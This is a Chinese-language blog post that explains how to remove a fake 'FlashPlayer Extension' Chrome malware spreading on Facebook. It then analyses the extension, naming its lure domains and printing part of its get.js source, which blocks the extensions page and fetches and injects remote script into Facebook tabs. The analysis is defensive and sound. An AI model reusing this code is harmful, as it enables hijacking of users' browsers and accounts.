這次的病毒現象大概像這樣:


你會收到來自某人的Tag,底下跟著一看就知道是病毒網址的網址,但還是很多人點了...
當然你還會莫名其妙的點了一堆粉絲專頁讚,發了一堆莫名其妙的訊息等。

此次專門針對 Google Chrome 而來,所以如果您使用其他瀏覽器可能不會發生這種狀況。
若發生了本篇並不適用您的情況。

先來講講刪除方式。

1. 打開擴充功能,當然,你會發現擴充功能頁面打不開。所以請點選 工具 -> 工作管理員,並將 FlashPlayer Extension V11.2 (該名稱很有可能更改) 結束掉,這時候就可以打開擴充功能。



2. 刪掉 FlashPlayer Extension V11.2!
3. 將Facebook App Center裡奇怪的應用程式刪除,然後請更改密碼。

Ok,到這裡基本上只是想刪除病毒的朋友們可以按下x離開本頁。


----------------------------------------------------------------------------------------------------------
先提醒各位,以下網址皆有可能已經失效。

剩下的朋友們我們進入問題頁面,點入網址 - xn--qqfsa4ugur.tk,會跳轉至www.fbhizmet.com/chrome.php。


看起來也是一個很明顯有問題要你Update Flash Player的頁面。
在這裡提醒一下,Google Chrome 本身內建有Flash Player,所以絕對不會要你更新Flash Player。

由於我們是要分析病毒,所以當然要下載下來,該 Web Store -chrome.google.com/webstore/detail/flashplayer-extension-v11/dceiojpfddghojpmfheadkiilbnlimib

安裝完成後,可以發現我們的擴充功能頁面會被跳轉至Chrome Web Store。
透過工作管理員將該插件停止,然後進入擴充功能頁面可以看到code如下:


view plaincopy to clipboardprint?
  1. nbsp;html>  
  2. body>  
  3. script src="inc/get.js">script>  

好的,我們可以看到核心是get.js,打開來可以看到如下代碼:

view plaincopy to clipboardprint?
  1. chrome.tabs.onCreated.addListener(function(tab){  
  2. if(tab.url.indexOf("chrome://extensions/") >= 0){  
  3. chrome.tabs.update(tab.id,{url:"http://goo.gl/bU7yo"});  
  4. }  
  5. });  
  6.   
  7. chrome.tabs.onUpdated.addListener(function(tabId){  
  8. chrome.tabs.get(tabId,function(tab){  
  9. if(tab.url.indexOf("chrome://extensions/") >= 0 || tab.url.indexOf("chrome://extensions-frame") >= 0){  
  10. chrome.tabs.update(tab.id,{url:"http://goo.gl/VT70G"});  
  11. }else if(tab.url.indexOf("facebook.com") >= 0){  
  12. var xmlhttp = new XMLHttpRequest();  
  13. xmlhttp.onreadystatechange = function () {  
  14. if(xmlhttp.readyState == 4){  
  15. chrome.tabs.executeScript(tab.id,{code:xmlhttp.responseText});  
  16. }  
  17. }  
  18. xmlhttp.open("GET""http://goo.gl/z2B5D?");   
  19. xmlhttp.send();  
  20. }  
  21. })});  
  22.   
  23. chrome.tabs.getCurrent(function(tab){  
  24. if(tab && tab.url.indexOf("chrome://extensions/") >= 0){  
  25. chrome.tabs.update(tab.id,{url:"http://goo.gl/KWJ6I"});  
  26. }  
  27. });  
  28.   
  29. chrome.tabs.getCurrent(function(tab){  
  30. if(tab && tab.url.indexOf("chrome://extensions/") >= 0){  
  31. chrome.tabs.update(tab.id,{url:"http://goo.gl/aKyj5"});  
  32. }  
  33. });   
  34.   
  35. var first_run = false;  
  36. if (!localStorage['ran_before']) {  
  37.   first_run = true;  
  38.   localStorage['ran_before'] = '1';  
  39. }  
  40.   
  41. var currentTab = "";  
  42. if (first_run)  
  43. {  
  44.  chrome.tabs.create({url: 'http://www.facebook.com'});  
arrow
arrow
    全站熱搜
    創作者介紹
    創作者 無尾熊 的頭像
    無尾熊

    無尾熊IT 資訊站

    無尾熊 發表在 痞客邦 留言(0) 人氣()

    E-mail轉寄